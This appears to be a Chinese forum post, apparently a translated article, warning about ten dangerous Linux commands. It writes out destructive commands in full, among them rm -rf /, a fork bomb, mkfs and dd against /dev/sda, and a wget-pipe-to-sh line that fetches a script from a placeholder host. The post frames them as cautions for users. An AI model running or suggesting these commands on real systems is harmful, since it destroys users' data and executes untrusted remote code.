黑帽联盟

 找回密码
 会员注册
查看: 1406|回复: 0
打印 上一主题 下一主题

[基础服务] Linux的10个最危险的命令

[复制链接]

895

主题

38

听众

3323

积分

管理员

Rank: 9Rank: 9Rank: 9

  • TA的每日心情
    无聊
    6 天前
  • 签到天数: 1644 天

    [LV.Master]伴坛终老

    Linux命令行佷有用、很高效,也很有趣,但有时候也很危险,尤其是在你不确定你自己在正在做什么时候。

    这篇文章将会向你介绍十条命令,但你最好不要尝试着去使用。
    当然,以下命令通常都是在root权限下才能将愚蠢发挥到无可救药;在普通用户身份下,破坏的只是自己的一亩三分地。

    1. rm -rf 命令 
    rm -rf命令是删除文件夹及其内容最快的方式之一。
    仅仅一丁点的敲错或无知都可能导致不可恢复的系统崩坏。
    下列是一些rm 命令的选项:
    • rm 命令在Linux下通常用来删除文件。
    • rm -r 命令递归的删除文件夹,甚至是空的文件夹。
    • rm -f 命令能不经过询问直接删除‘只读文件’。Linux下删除文件并不在乎该文件是否是只读的,而只是在意其父目录是否有写权限。所以,-f这个参数只是表示不必一个个删除确认,而是一律悄悄删除。另外,原始的rm命令其实也是没有删除提示的,只是一般的发行版都会将rm通过别名的方式增加-i参数来要求删除确认,而-f则抑制了这个提示。
    • rm -rf / : 强制删除根目录下所有东东。
    • rm -rf *: 强制删除当前目录的所有文件。
    • rm -rf . : 强制删除当前文件夹及其子文件夹。

    从现在起,当你要执行rm -rf命令时请留心一点。我们可以在“.bashrc”文件对‘rm‘命令创建rm -i的别名,来预防用 ‘rm‘命令删除文件时的事故,它会要求你确认每一个删除请求。(译注:大多数发行版已经这样做了,如果还没有,请这样做,并在使用-f参数前一定考虑好你在做什么!译者本人有着血泪的教训啊。)

    2. :(){:|:&};: 命令
    这就是个fork 炸弹的实例。
    具体操作是通过定义一个名为 ‘:‘的函数,它会调用自己两次,一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。
    7.jpg

    3. 命令 > /dev/sda
    这个命令会将某个‘命令‘的输出写到块设备/dev/sda中。
    该操作会将在块设备中的所有数据块替换为命令写入的原始数据,从而导致整个块设备的数据丢失。

    4. mv 文件夹 /dev/null
    这个命令会移动某个‘文件夹‘到/dev/null。
    在Linux中 /dev/null 或 null 设备是一个特殊的文件,所有写入它的数据都会被清除,然后返回写操作成功。
    当然,要说明的是这个命令并不能阻止数据恢复软件——所以,真正的彻底毁灭,需要采用专用的软件或者手法来完成。
    8.jpg

    5. wget http://malicious_source -O- | sh
    该命令会从一个(也许是)恶意源下载一个脚本并执行。
    Wget命令会下载这个脚本,而sh会(无条件的)执行下载下来的脚本。
    注意: 你应该时刻注意你下载包或脚本的源。只能使用那些从可信任的源中下载脚本/程序。

    6. mkfs.ext3 /dev/sda
    上列命令会格式化块设备‘sda’,在执行这个命令后你的块设备(硬盘驱动器)会被格式化,直接让你的系统达到不可恢复的阶段。
    通常我们不会直接使用/dev/sda这样的设备,除非是作为raw设备使用。
    一般都需要将sda分成类似sda1、sda2这样的分区后才使用。当然,无论你使用sda还是sda1,这样对块设备或分区进行mkfs都是毁灭性的,上面的数据都会被蒸发了。

    7. > file
    这个命令常用来清空文件内容或记录命令输出。
    不过请在执行前,确认输出的文件是空的或者还不存在,否则原来的文件可真是恢复不了了——连数据恢复软件都未必能帮助你了。
    你可能真正想用的是“>>”,即累加新的输出到文件,而不是刷新那个文件。
    如果用上列执行时输入错误或无知的输入类似 “> xt.conf” 的命令会覆盖配置文件或其他任何的系统配置文件。

    8. ^foo^bar
    这个命令用来编辑先前运行的命令而无需重打整个命令。
    用foobar命令时如果你没有彻底检查改变原始命令的风险,这可能导致真正的麻烦。

    9. dd if=/dev/random of=/dev/sda
    这个命令会向块设备sda写入随机的垃圾文件从而擦出数据,让你的系统可能陷入混乱和不可恢复的状态。
    记得上面说过mv到黑洞并不能彻底删除数据么?那么这个命令就是给了你一个彻底删除的方法!当然为了保险起见,你可以覆写多次。

    10. 隐藏命令 
    下面的命令其实就是上面第一个命令 (rm -rf)。
    这里的代码是隐藏在十六进制里的,一个无知的用户可能就会被愚弄,如果在终端里运行下面命令可能会擦除你的根分区。
    真正的危险是隐藏起来的,不会被轻易的检测到。你必须时刻留心你在做什么结果会怎样。
    切记,千万不要编译/运行从未知来源的代码。
    9.jpg

    今天给大家带来的是个命令到这里就结束了啦,请千万记住不要再服务器或者其他设备上随意尝试~
    如果你想测试它们,请在虚拟机上运行,不然文件丢失或者系统奔溃就不好了。

    帖子永久地址: 

    黑帽联盟 - 论坛版权1、本主题所有言论和图片纯属会员个人意见,与本论坛立场无关
    2、本站所有主题由该帖子作者发表,该帖子作者与黑帽联盟享有帖子相关版权
    3、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者和黑帽联盟的同意
    4、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
    5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
    6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
    7、黑帽联盟管理员和版主有权不事先通知发贴者而删除本文

    勿忘初心,方得始终!
    您需要登录后才可以回帖 登录 | 会员注册

    发布主题 !fastreply! 收藏帖子 返回列表 搜索
    回顶部